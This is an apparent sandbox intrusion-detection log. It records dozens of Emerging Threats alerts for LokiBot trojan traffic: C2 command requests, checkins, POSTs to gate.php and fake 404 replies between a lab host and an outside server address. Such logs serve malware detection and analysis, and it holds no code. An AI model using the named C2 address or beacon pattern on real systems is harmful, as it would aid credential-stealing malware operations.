                                    12/03/20-10:04:11.075915TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5000480192.168.2.347.91.79.163
                                    12/03/20-10:04:11.206683TCP2025483ET TROJAN LokiBot Fake 404 Response805000447.91.79.163192.168.2.3
                                    12/03/20-10:04:11.442584TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000580192.168.2.347.91.79.163
                                    12/03/20-10:04:11.442584TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000580192.168.2.347.91.79.163
                                    12/03/20-10:04:11.442584TCP2025381ET TROJAN LokiBot Checkin5000580192.168.2.347.91.79.163
                                    12/03/20-10:04:11.442584TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000580192.168.2.347.91.79.163
                                    12/03/20-10:04:11.442584TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5000580192.168.2.347.91.79.163
                                    12/03/20-10:04:11.511031TCP2025483ET TROJAN LokiBot Fake 404 Response805000547.91.79.163192.168.2.3
                                    12/03/20-10:04:11.722307TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000680192.168.2.347.91.79.163
                                    12/03/20-10:04:11.722307TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000680192.168.2.347.91.79.163
                                    12/03/20-10:04:11.722307TCP2025381ET TROJAN LokiBot Checkin5000680192.168.2.347.91.79.163
                                    12/03/20-10:04:11.722307TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000680192.168.2.347.91.79.163
                                    12/03/20-10:04:11.722307TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5000680192.168.2.347.91.79.163
                                    12/03/20-10:04:11.775321TCP2025483ET TROJAN LokiBot Fake 404 Response805000647.91.79.163192.168.2.3
                                    12/03/20-10:04:11.992416TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000780192.168.2.347.91.79.163
                                    12/03/20-10:04:11.992416TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000780192.168.2.347.91.79.163
                                    12/03/20-10:04:11.992416TCP2025381ET TROJAN LokiBot Checkin5000780192.168.2.347.91.79.163
                                    12/03/20-10:04:11.992416TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000780192.168.2.347.91.79.163
                                    12/03/20-10:04:11.992416TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5000780192.168.2.347.91.79.163
                                    12/03/20-10:04:12.055451TCP2025483ET TROJAN LokiBot Fake 404 Response805000747.91.79.163192.168.2.3
                                    12/03/20-10:04:12.296639TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000880192.168.2.347.91.79.163
                                    12/03/20-10:04:12.296639TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000880192.168.2.347.91.79.163
                                    12/03/20-10:04:12.296639TCP2025381ET TROJAN LokiBot Checkin5000880192.168.2.347.91.79.163
                                    12/03/20-10:04:12.296639TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000880192.168.2.347.91.79.163
                                    12/03/20-10:04:12.296639TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5000880192.168.2.347.91.79.163
                                    12/03/20-10:04:12.396987TCP2025483ET TROJAN LokiBot Fake 404 Response805000847.91.79.163192.168.2.3
                                    12/03/20-10:04:12.634507TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000980192.168.2.347.91.79.163
                                    12/03/20-10:04:12.634507TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000980192.168.2.347.91.79.163
                                    12/03/20-10:04:12.634507TCP2025381ET TROJAN LokiBot Checkin5000980192.168.2.347.91.79.163
                                    12/03/20-10:04:12.634507TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000980192.168.2.347.91.79.163
                                    12/03/20-10:04:12.634507TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5000980192.168.2.347.91.79.163
                                    12/03/20-10:04:12.694489TCP2025483ET TROJAN LokiBot Fake 404 Response805000947.91.79.163192.168.2.3
                                    12/03/20-10:04:12.913600TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001080192.168.2.347.91.79.163
                                    12/03/20-10:04:12.913600TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001080192.168.2.347.91.79.163
                                    12/03/20-10:04:12.913600TCP2025381ET TROJAN LokiBot Checkin5001080192.168.2.347.91.79.163
                                    12/03/20-10:04:12.913600TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001080192.168.2.347.91.79.163
                                    12/03/20-10:04:12.913600TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5001080192.168.2.347.91.79.163
                                    12/03/20-10:04:12.980753TCP2025483ET TROJAN LokiBot Fake 404 Response805001047.91.79.163192.168.2.3
                                    12/03/20-10:04:13.192843TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001180192.168.2.347.91.79.163
                                    12/03/20-10:04:13.192843TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001180192.168.2.347.91.79.163
                                    12/03/20-10:04:13.192843TCP2025381ET TROJAN LokiBot Checkin5001180192.168.2.347.91.79.163
                                    12/03/20-10:04:13.192843TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001180192.168.2.347.91.79.163
                                    12/03/20-10:04:13.192843TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5001180192.168.2.347.91.79.163
                                    12/03/20-10:04:13.277597TCP2025483ET TROJAN LokiBot Fake 404 Response805001147.91.79.163192.168.2.3
                                    12/03/20-10:04:13.509328TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001280192.168.2.347.91.79.163
                                    12/03/20-10:04:13.509328TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001280192.168.2.347.91.79.163
                                    12/03/20-10:04:13.509328TCP2025381ET TROJAN LokiBot Checkin5001280192.168.2.347.91.79.163
                                    12/03/20-10:04:13.509328TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001280192.168.2.347.91.79.163
                                    12/03/20-10:04:13.509328TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5001280192.168.2.347.91.79.163
                                    12/03/20-10:04:13.581256TCP2025483ET TROJAN LokiBot Fake 404 Response805001247.91.79.163192.168.2.3
                                    12/03/20-10:04:13.827815TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001380192.168.2.347.91.79.163
                                    12/03/20-10:04:13.827815TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001380192.168.2.347.91.79.163
                                    12/03/20-10:04:13.827815TCP2025381ET TROJAN LokiBot Checkin5001380192.168.2.347.91.79.163
                                    12/03/20-10:04:13.827815TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001380192.168.2.347.91.79.163
                                    12/03/20-10:04:13.827815TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5001380192.168.2.347.91.79.163
                                    12/03/20-10:04:13.898849TCP2025483ET TROJAN LokiBot Fake 404 Response805001347.91.79.163192.168.2.3
                                    12/03/20-10:04:14.124274TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001480192.168.2.347.91.79.163
                                    12/03/20-10:04:14.124274TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001480192.168.2.347.91.79.163
                                    12/03/20-10:04:14.124274TCP2025381ET TROJAN LokiBot Checkin5001480192.168.2.347.91.79.163
                                    12/03/20-10:04:14.124274TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001480192.168.2.347.91.79.163
                                    12/03/20-10:04:14.124274TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5001480192.168.2.347.91.79.163
                                    12/03/20-10:04:14.184983TCP2025483ET TROJAN LokiBot Fake 404 Response805001447.91.79.163192.168.2.3
                                    12/03/20-10:04:14.405318TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001580192.168.2.347.91.79.163
                                    12/03/20-10:04:14.405318TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001580192.168.2.347.91.79.163
                                    12/03/20-10:04:14.405318TCP2025381ET TROJAN LokiBot Checkin5001580192.168.2.347.91.79.163
                                    12/03/20-10:04:14.405318TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001580192.168.2.347.91.79.163
                                    12/03/20-10:04:14.405318TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5001580192.168.2.347.91.79.163
                                    12/03/20-10:04:14.465339TCP2025483ET TROJAN LokiBot Fake 404 Response805001547.91.79.163192.168.2.3
                                    12/03/20-10:04:14.692822TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001680192.168.2.347.91.79.163
                                    12/03/20-10:04:14.692822TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001680192.168.2.347.91.79.163
                                    12/03/20-10:04:14.692822TCP2025381ET TROJAN LokiBot Checkin5001680192.168.2.347.91.79.163
                                    12/03/20-10:04:14.692822TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001680192.168.2.347.91.79.163
                                    12/03/20-10:04:14.692822TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5001680192.168.2.347.91.79.163
                                    12/03/20-10:04:14.751431TCP2025483ET TROJAN LokiBot Fake 404 Response805001647.91.79.163192.168.2.3
                                    12/03/20-10:04:14.958776TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001780192.168.2.347.91.79.163
                                    12/03/20-10:04:14.958776TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001780192.168.2.347.91.79.163
                                    12/03/20-10:04:14.958776TCP2025381ET TROJAN LokiBot Checkin5001780192.168.2.347.91.79.163
                                    12/03/20-10:04:14.958776TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001780192.168.2.347.91.79.163
                                    12/03/20-10:04:14.958776TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5001780192.168.2.347.91.79.163
                                    12/03/20-10:04:15.017358TCP2025483ET TROJAN LokiBot Fake 404 Response805001747.91.79.163192.168.2.3
                                    12/03/20-10:04:15.237436TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001880192.168.2.347.91.79.163
                                    12/03/20-10:04:15.237436TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001880192.168.2.347.91.79.163
                                    12/03/20-10:04:15.237436TCP2025381ET TROJAN LokiBot Checkin5001880192.168.2.347.91.79.163
                                    12/03/20-10:04:15.237436TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001880192.168.2.347.91.79.163
                                    12/03/20-10:04:15.237436TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5001880192.168.2.347.91.79.163
                                    12/03/20-10:04:15.303064TCP2025483ET TROJAN LokiBot Fake 404 Response805001847.91.79.163192.168.2.3
                                    12/03/20-10:04:15.514679TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001980192.168.2.347.91.79.163
                                    12/03/20-10:04:15.514679TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001980192.168.2.347.91.79.163
                                    12/03/20-10:04:15.514679TCP2025381ET TROJAN LokiBot Checkin5001980192.168.2.347.91.79.163
                                    12/03/20-10:04:15.514679TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001980192.168.2.347.91.79.163
                                    12/03/20-10:04:15.514679TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5001980192.168.2.347.91.79.163
                                    12/03/20-10:04:15.574409TCP2025483ET TROJAN LokiBot Fake 404 Response805001947.91.79.163192.168.2.3
                                    12/03/20-10:04:15.796982TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002080192.168.2.347.91.79.163
                                    12/03/20-10:04:15.796982TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002080192.168.2.347.91.79.163
                                    12/03/20-10:04:15.796982TCP2025381ET TROJAN LokiBot Checkin5002080192.168.2.347.91.79.163
                                    12/03/20-10:04:15.796982TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002080192.168.2.347.91.79.163
                                    12/03/20-10:04:15.796982TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5002080192.168.2.347.91.79.163
                                    12/03/20-10:04:15.856978TCP2025483ET TROJAN LokiBot Fake 404 Response805002047.91.79.163192.168.2.3
                                    12/03/20-10:04:16.076667TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002180192.168.2.347.91.79.163
                                    12/03/20-10:04:16.076667TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002180192.168.2.347.91.79.163
                                    12/03/20-10:04:16.076667TCP2025381ET TROJAN LokiBot Checkin5002180192.168.2.347.91.79.163
                                    12/03/20-10:04:16.076667TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002180192.168.2.347.91.79.163
                                    12/03/20-10:04:16.076667TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5002180192.168.2.347.91.79.163
                                    12/03/20-10:04:16.139505TCP2025483ET TROJAN LokiBot Fake 404 Response805002147.91.79.163192.168.2.3
                                    12/03/20-10:04:16.567527TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002280192.168.2.347.91.79.163
                                    12/03/20-10:04:16.567527TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002280192.168.2.347.91.79.163
                                    12/03/20-10:04:16.567527TCP2025381ET TROJAN LokiBot Checkin5002280192.168.2.347.91.79.163
                                    12/03/20-10:04:16.567527TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002280192.168.2.347.91.79.163
                                    12/03/20-10:04:16.567527TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5002280192.168.2.347.91.79.163
                                    12/03/20-10:04:16.627368TCP2025483ET TROJAN LokiBot Fake 404 Response805002247.91.79.163192.168.2.3
                                    12/03/20-10:04:16.871689TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002380192.168.2.347.91.79.163
                                    12/03/20-10:04:16.871689TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002380192.168.2.347.91.79.163
                                    12/03/20-10:04:16.871689TCP2025381ET TROJAN LokiBot Checkin5002380192.168.2.347.91.79.163
                                    12/03/20-10:04:16.871689TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002380192.168.2.347.91.79.163
                                    12/03/20-10:04:16.871689TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5002380192.168.2.347.91.79.163
                                    12/03/20-10:04:16.927499TCP2025483ET TROJAN LokiBot Fake 404 Response805002347.91.79.163192.168.2.3
                                    12/03/20-10:04:17.160447TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002480192.168.2.347.91.79.163
                                    12/03/20-10:04:17.160447TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002480192.168.2.347.91.79.163
                                    12/03/20-10:04:17.160447TCP2025381ET TROJAN LokiBot Checkin5002480192.168.2.347.91.79.163
                                    12/03/20-10:04:17.160447TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002480192.168.2.347.91.79.163
                                    12/03/20-10:04:17.160447TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5002480192.168.2.347.91.79.163
                                    12/03/20-10:04:17.228399TCP2025483ET TROJAN LokiBot Fake 404 Response805002447.91.79.163192.168.2.3
                                    12/03/20-10:04:17.884116TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002580192.168.2.347.91.79.163
                                    12/03/20-10:04:17.884116TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002580192.168.2.347.91.79.163
                                    12/03/20-10:04:17.884116TCP2025381ET TROJAN LokiBot Checkin5002580192.168.2.347.91.79.163
                                    12/03/20-10:04:17.884116TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002580192.168.2.347.91.79.163
                                    12/03/20-10:04:17.884116TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5002580192.168.2.347.91.79.163
                                    12/03/20-10:04:17.950230TCP2025483ET TROJAN LokiBot Fake 404 Response805002547.91.79.163192.168.2.3
                                    12/03/20-10:04:18.181600TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002680192.168.2.347.91.79.163
                                    12/03/20-10:04:18.181600TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002680192.168.2.347.91.79.163
                                    12/03/20-10:04:18.181600TCP2025381ET TROJAN LokiBot Checkin5002680192.168.2.347.91.79.163
                                    12/03/20-10:04:18.181600TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002680192.168.2.347.91.79.163
                                    12/03/20-10:04:18.181600TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5002680192.168.2.347.91.79.163
                                    12/03/20-10:04:18.240685TCP2025483ET TROJAN LokiBot Fake 404 Response805002647.91.79.163192.168.2.3
                                    12/03/20-10:04:19.967293TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002780192.168.2.347.91.79.163
                                    12/03/20-10:04:19.967293TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002780192.168.2.347.91.79.163
                                    12/03/20-10:04:19.967293TCP2025381ET TROJAN LokiBot Checkin5002780192.168.2.347.91.79.163
                                    12/03/20-10:04:19.967293TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002780192.168.2.347.91.79.163
                                    12/03/20-10:04:19.967293TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5002780192.168.2.347.91.79.163
                                    12/03/20-10:04:20.027369TCP2025483ET TROJAN LokiBot Fake 404 Response805002747.91.79.163192.168.2.3
                                    12/03/20-10:04:20.275988TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002880192.168.2.347.91.79.163
                                    12/03/20-10:04:20.275988TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002880192.168.2.347.91.79.163
                                    12/03/20-10:04:20.275988TCP2025381ET TROJAN LokiBot Checkin5002880192.168.2.347.91.79.163
                                    12/03/20-10:04:20.275988TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002880192.168.2.347.91.79.163
                                    12/03/20-10:04:20.275988TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5002880192.168.2.347.91.79.163
                                    12/03/20-10:04:20.335600TCP2025483ET TROJAN LokiBot Fake 404 Response805002847.91.79.163192.168.2.3
                                    12/03/20-10:04:20.550109TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002980192.168.2.347.91.79.163
                                    12/03/20-10:04:20.550109TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002980192.168.2.347.91.79.163
                                    12/03/20-10:04:20.550109TCP2025381ET TROJAN LokiBot Checkin5002980192.168.2.347.91.79.163
                                    12/03/20-10:04:20.550109TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002980192.168.2.347.91.79.163
                                    12/03/20-10:04:20.550109TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5002980192.168.2.347.91.79.163
                                    12/03/20-10:04:20.616818TCP2025483ET TROJAN LokiBot Fake 404 Response805002947.91.79.163192.168.2.3
                                    12/03/20-10:04:20.852617TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003080192.168.2.347.91.79.163
                                    12/03/20-10:04:20.852617TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003080192.168.2.347.91.79.163
                                    12/03/20-10:04:20.852617TCP2025381ET TROJAN LokiBot Checkin5003080192.168.2.347.91.79.163
                                    12/03/20-10:04:20.852617TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003080192.168.2.347.91.79.163
                                    12/03/20-10:04:20.852617TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5003080192.168.2.347.91.79.163
                                    12/03/20-10:04:21.067118TCP2025483ET TROJAN LokiBot Fake 404 Response805003047.91.79.163192.168.2.3
                                    12/03/20-10:04:21.297703TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003180192.168.2.347.91.79.163
                                    12/03/20-10:04:21.297703TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003180192.168.2.347.91.79.163
                                    12/03/20-10:04:21.297703TCP2025381ET TROJAN LokiBot Checkin5003180192.168.2.347.91.79.163
                                    12/03/20-10:04:21.297703TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003180192.168.2.347.91.79.163
                                    12/03/20-10:04:21.297703TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5003180192.168.2.347.91.79.163
                                    12/03/20-10:04:21.363495TCP2025483ET TROJAN LokiBot Fake 404 Response805003147.91.79.163192.168.2.3
                                    12/03/20-10:04:21.576517TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003280192.168.2.347.91.79.163
                                    12/03/20-10:04:21.576517TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003280192.168.2.347.91.79.163
                                    12/03/20-10:04:21.576517TCP2025381ET TROJAN LokiBot Checkin5003280192.168.2.347.91.79.163
                                    12/03/20-10:04:21.576517TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003280192.168.2.347.91.79.163
                                    12/03/20-10:04:21.576517TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5003280192.168.2.347.91.79.163
                                    12/03/20-10:04:21.640627TCP2025483ET TROJAN LokiBot Fake 404 Response805003247.91.79.163192.168.2.3
                                    12/03/20-10:04:21.902507TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003380192.168.2.347.91.79.163
                                    12/03/20-10:04:21.902507TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003380192.168.2.347.91.79.163
                                    12/03/20-10:04:21.902507TCP2025381ET TROJAN LokiBot Checkin5003380192.168.2.347.91.79.163
                                    12/03/20-10:04:21.902507TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003380192.168.2.347.91.79.163
                                    12/03/20-10:04:21.902507TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5003380192.168.2.347.91.79.163
                                    12/03/20-10:04:21.955470TCP2025483ET TROJAN LokiBot Fake 404 Response805003347.91.79.163192.168.2.3
                                    12/03/20-10:04:22.174316TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003480192.168.2.347.91.79.163
                                    12/03/20-10:04:22.174316TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003480192.168.2.347.91.79.163
                                    12/03/20-10:04:22.174316TCP2025381ET TROJAN LokiBot Checkin5003480192.168.2.347.91.79.163
                                    12/03/20-10:04:22.174316TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003480192.168.2.347.91.79.163
                                    12/03/20-10:04:22.174316TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5003480192.168.2.347.91.79.163
                                    12/03/20-10:04:22.233497TCP2025483ET TROJAN LokiBot Fake 404 Response805003447.91.79.163192.168.2.3
                                    12/03/20-10:04:22.442214TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003580192.168.2.347.91.79.163
                                    12/03/20-10:04:22.442214TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003580192.168.2.347.91.79.163
                                    12/03/20-10:04:22.442214TCP2025381ET TROJAN LokiBot Checkin5003580192.168.2.347.91.79.163
                                    12/03/20-10:04:22.442214TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003580192.168.2.347.91.79.163
                                    12/03/20-10:04:22.442214TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5003580192.168.2.347.91.79.163
                                    12/03/20-10:04:22.546780TCP2025483ET TROJAN LokiBot Fake 404 Response805003547.91.79.163192.168.2.3
                                    12/03/20-10:04:22.769362TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003680192.168.2.347.91.79.163
                                    12/03/20-10:04:22.769362TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003680192.168.2.347.91.79.163
                                    12/03/20-10:04:22.769362TCP2025381ET TROJAN LokiBot Checkin5003680192.168.2.347.91.79.163
                                    12/03/20-10:04:22.769362TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003680192.168.2.347.91.79.163
                                    12/03/20-10:04:22.769362TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5003680192.168.2.347.91.79.163
                                    12/03/20-10:04:22.829093TCP2025483ET TROJAN LokiBot Fake 404 Response805003647.91.79.163192.168.2.3
                                    12/03/20-10:04:23.028922TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003780192.168.2.347.91.79.163
                                    12/03/20-10:04:23.028922TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003780192.168.2.347.91.79.163
                                    12/03/20-10:04:23.028922TCP2025381ET TROJAN LokiBot Checkin5003780192.168.2.347.91.79.163
                                    12/03/20-10:04:23.028922TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003780192.168.2.347.91.79.163
                                    12/03/20-10:04:23.028922TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5003780192.168.2.347.91.79.163
                                    12/03/20-10:04:23.092648TCP2025483ET TROJAN LokiBot Fake 404 Response805003747.91.79.163192.168.2.3
                                    12/03/20-10:04:23.302682TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003880192.168.2.347.91.79.163
                                    12/03/20-10:04:23.302682TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003880192.168.2.347.91.79.163
                                    12/03/20-10:04:23.302682TCP2025381ET TROJAN LokiBot Checkin5003880192.168.2.347.91.79.163
                                    12/03/20-10:04:23.302682TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003880192.168.2.347.91.79.163
                                    12/03/20-10:04:23.302682TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5003880192.168.2.347.91.79.163
                                    12/03/20-10:04:23.366543TCP2025483ET TROJAN LokiBot Fake 404 Response805003847.91.79.163192.168.2.3
                                    12/03/20-10:04:23.590395TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003980192.168.2.347.91.79.163
                                    12/03/20-10:04:23.590395TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003980192.168.2.347.91.79.163
                                    12/03/20-10:04:23.590395TCP2025381ET TROJAN LokiBot Checkin5003980192.168.2.347.91.79.163
                                    12/03/20-10:04:23.590395TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003980192.168.2.347.91.79.163
                                    12/03/20-10:04:23.590395TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5003980192.168.2.347.91.79.163
                                    12/03/20-10:04:23.648849TCP2025483ET TROJAN LokiBot Fake 404 Response805003947.91.79.163192.168.2.3
                                    12/03/20-10:04:23.869443TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004080192.168.2.347.91.79.163
                                    12/03/20-10:04:23.869443TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004080192.168.2.347.91.79.163
                                    12/03/20-10:04:23.869443TCP2025381ET TROJAN LokiBot Checkin5004080192.168.2.347.91.79.163
                                    12/03/20-10:04:23.869443TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004080192.168.2.347.91.79.163
                                    12/03/20-10:04:23.869443TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5004080192.168.2.347.91.79.163
                                    12/03/20-10:04:23.928852TCP2025483ET TROJAN LokiBot Fake 404 Response805004047.91.79.163192.168.2.3
                                    12/03/20-10:04:24.157418TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004180192.168.2.347.91.79.163
                                    12/03/20-10:04:24.157418TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004180192.168.2.347.91.79.163
                                    12/03/20-10:04:24.157418TCP2025381ET TROJAN LokiBot Checkin5004180192.168.2.347.91.79.163
                                    12/03/20-10:04:24.157418TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004180192.168.2.347.91.79.163
                                    12/03/20-10:04:24.157418TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5004180192.168.2.347.91.79.163
                                    12/03/20-10:04:24.216683TCP2025483ET TROJAN LokiBot Fake 404 Response805004147.91.79.163192.168.2.3
                                    12/03/20-10:04:24.445219TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004280192.168.2.347.91.79.163
                                    12/03/20-10:04:24.445219TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004280192.168.2.347.91.79.163
                                    12/03/20-10:04:24.445219TCP2025381ET TROJAN LokiBot Checkin5004280192.168.2.347.91.79.163
                                    12/03/20-10:04:24.445219TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004280192.168.2.347.91.79.163
                                    12/03/20-10:04:24.445219TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5004280192.168.2.347.91.79.163
                                    12/03/20-10:04:24.503657TCP2025483ET TROJAN LokiBot Fake 404 Response805004247.91.79.163192.168.2.3
                                    12/03/20-10:04:24.740638TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004380192.168.2.347.91.79.163
                                    12/03/20-10:04:24.740638TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004380192.168.2.347.91.79.163
                                    12/03/20-10:04:24.740638TCP2025381ET TROJAN LokiBot Checkin5004380192.168.2.347.91.79.163
                                    12/03/20-10:04:24.740638TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004380192.168.2.347.91.79.163
                                    12/03/20-10:04:24.740638TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5004380192.168.2.347.91.79.163
                                    12/03/20-10:04:24.798672TCP2025483ET TROJAN LokiBot Fake 404 Response805004347.91.79.163192.168.2.3
                                    12/03/20-10:04:25.359903TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004480192.168.2.347.91.79.163
